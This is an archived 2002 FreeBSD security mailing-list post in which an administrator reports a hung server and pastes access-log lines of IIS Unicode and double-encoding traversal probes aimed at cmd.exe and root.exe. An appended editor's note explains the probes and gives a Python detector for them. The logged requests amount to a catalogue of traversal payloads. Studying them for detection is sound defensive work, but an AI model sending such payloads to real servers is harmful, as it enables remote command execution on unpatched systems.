Date:      Sat, 26 Jan 2002 09:13:12 -0800
From:      "William J. Borskey" <wborskey@hotmail.com>
To:        freebsd-security@freebsd.org
Subject:   weird server activity
Message-ID:  <F31rfFz82buW5RNB6Hf00001c34@hotmail.com>

I am running FreeBSD 4.4. I use Apache-fp and openssh. About a week ago my system went down and I wasn't able to log in or look at any web pages. I could connect, but it would not spawn a process to log me in, or serve me a web document. I got someone to reboot the machine from the console, and I was then able to log into the machine. Starting processes was slow but top reports normal system loads. Then after about an hour the machine would no longer run any processes and quickly shut me out by killing the sshd I was connected with. I did get a chance to look at some of my logs, not all unfortunately. The httpd-access file had some weird sequences of Windows-sounding paths, but it wasn't Code Red or anything like Code Red:
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET
"-"
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
I haven't been able to look at any other logs, and I doubt that that has anything to do with it.

William Borskey
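Editor's note, added here and not part of the original post: the request sequence above is the IIS Unicode / double-decoding directory-traversal probe set (root.exe, then cmd.exe reached through %c0%af, %c1%9c, %255c, %%35%63 and similar encodings; the bugs fixed by MS00-078 and MS01-026, and the sequence the Nimda worm scanned with). It targets IIS; on Apache every variant can only produce the 404/400 seen in the log, which is consistent with the author's reading that the scan is unrelated to the hang. The script below is an added example (my code, not the author's or FreeBSD's) that parses lines in the post's log format, decodes the traversal encodings the way a permissive decoder would, and flags probes, separating the rejected ones from any the server actually served. The sample lines are constructed to match the post's format; the 192.0.2.7 source and its 200 response are invented to exercise the "served" case and do not appear in the author's log.

```python
"""Flag IIS Unicode / double-decoding traversal probes in Apache access logs."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines modelled on the post's log format.  The post's server
# writes each request twice (common format, then the same request with empty
# "-" "-" referer/user-agent fields); LOG_RE accepts both shapes.  The
# 192.0.2.7 entries are invented to show a probe that was actually served.
SAMPLE_LOG = """\
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
192.0.2.7 - - [19/Jan/2002:15:13:09 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1510 "-" "-"
192.0.2.7 - - [19/Jan/2002:15:14:00 -0600] "GET /index.html HTTP/1.0" 200 1432 "-" "Mozilla/4.0"
"""

# Common log format with optional HTTP version and optional referer/user-agent pair.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?$'
)

# Two-byte sequences the unpatched IIS decoder accepted as '/' or '\'.  A correct
# UTF-8 decoder rejects all of them (overlong or simply malformed).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/", b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}

TRAVERSAL_RE = re.compile(r"\.\.[\\/]")
TARGET_RE = re.compile(r"root\.exe|cmd\.exe", re.IGNORECASE)


def normalise_path(path: str, max_passes: int = 3) -> str:
    """Percent-decode repeatedly (undoing %25 double encoding) and fold the
    overlong byte pairs to the slash they stand for, so every variant in the
    probe set collapses to a literal '..\\' or '../'.  Works on bytes so the raw
    0xC0/0xC1 sequences survive until the replacement step."""
    raw = path.encode("latin-1", "replace")
    for _ in range(max_passes):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for seq, slash in OVERLONG.items():
        raw = raw.replace(seq, slash)
    return raw.decode("latin-1")


def classify(path: str):
    """Return (label, decoded_path); label is None for a non-probe request."""
    decoded = normalise_path(path)
    if not TARGET_RE.search(decoded):
        return None, decoded
    if "root.exe" in decoded.lower():
        return "iis-root.exe-backdoor", decoded    # shell left behind by an earlier infection
    if TRAVERSAL_RE.search(decoded):
        return "iis-unicode-traversal", decoded
    return "iis-cmd.exe-direct", decoded           # e.g. /c/winnt/system32/cmd.exe via a drive vdir


def scan(log_text: str):
    """Parse every line; return (probe findings, lines the regex could not parse)."""
    findings, unparsed = [], []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            unparsed.append(line)
            continue
        label, decoded = classify(m["path"])
        if label:
            status = int(m["status"])
            findings.append({"ip": m["ip"], "ts": m["ts"], "label": label,
                             "path": m["path"], "decoded": decoded,
                             "status": status, "served": 200 <= status < 300})
    return findings, unparsed


def summarise(findings):
    """Per-source probe count and how many drew a 2xx (those deserve a closer look)."""
    by_ip = {}
    for f in findings:
        d = by_ip.setdefault(f["ip"], {"probes": 0, "served": 0})
        d["probes"] += 1
        d["served"] += int(f["served"])
    return by_ip


if __name__ == "__main__":
    found, bad = scan(SAMPLE_LOG)
    for f in found:
        verdict = "SERVED" if f["served"] else "rejected"
        print(f'{f["ts"]} {f["ip"]:<14} {f["status"]} {verdict:<8} {f["label"]:<22} {f["decoded"]}')
    print(summarise(found))
    if bad:
        print("unparsed:", bad)
```

Run it against the real httpd-access file with `scan(open(path).read())`; the only result that should change the conclusion is a probe with `served` set, since every request in the post's excerpt is a 404 or 400.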







Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?F31rfFz82buW5RNB6Hf00001c34>